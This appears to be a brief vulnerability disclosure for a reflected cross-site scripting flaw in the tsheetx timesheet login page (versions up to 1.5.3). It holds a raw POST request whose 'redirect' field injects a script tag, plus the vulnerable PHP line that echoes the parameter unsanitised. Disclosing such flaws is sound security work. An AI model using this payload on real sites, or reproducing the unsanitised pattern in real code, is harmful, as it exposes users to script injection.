Miikka Värri

To reproduce: POST /login.php HTTP/1.1 Host: localhost Content-Length: 108 Cache-Control: max-age=0 Origin: http://localhost Upgrade-Insecure-Requests: 1 DNT: 1 Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Referer: http://localhost/login.php Accept-Encoding: gzip, deflate Accept-Language: en-GB,en;q=0.9,en-US;q=0.8,fi;q=0.7 Connection: close redirect="/><script>alert("XSS")</script><input style="disp...

There's a cross-site scripting vulnerability in login form that allows an attacker to execute arbitrary HTML and JavaScript code via a "redirect" parameter. Version: <=1.5.3 https://sourceforge.net/p/tsheetx/code/497/tree/branches/legacy/login.php#l40 https://sourceforge.net/p/tsheetx/code/497/tree/branches/legacy/login.php#l54 $redirect = isset($_REQUEST["redirect"]) ? $_REQUEST["redirect"] : ""; ?> <html> <head> <title>Timesheet Login</title> <?php include ("header.inc"); ?> </head> <body onLoad="document.loginForm.username.focus();">...